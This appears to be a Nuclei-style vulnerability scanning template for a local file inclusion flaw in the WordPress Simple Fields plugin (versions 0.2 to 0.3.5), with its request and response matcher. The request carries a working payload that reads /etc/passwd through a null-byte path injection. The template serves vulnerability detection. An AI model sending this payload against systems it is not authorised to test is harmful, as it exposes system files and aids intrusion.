id: wp-simple-fields-lfi

info:
  name: WordPress Simple Fields 0.2 - 0.3.5 LFI/RFI/RCE
  author: 0x240x23elu
  severity: high
  description: WordPress Simple Fields 0.2 is vulnerable to local file inclusion, remote file inclusion, and remote code execution.
  reference:
    - https://packetstormsecurity.com/files/147102/WordPress-Simple-Fields-0.3.5-File-Inclusion-Remote-Code-Execution.html
  metadata:
    max-request: 1
  tags: wp-plugin,lfi,packetstorm,wordpress

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00"

    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
        part: body

# digest: 4a0a00473045022100ef08afd8363510ffe9fe413cb68346ce3e3d8bdb892387a0d67b6f071e20449102205e53317445d38cb9f3b5cc9b74f17644e697b5e1e759462f075e5742a90b5ad7:922c64590222798bb761d5b6d8e72950
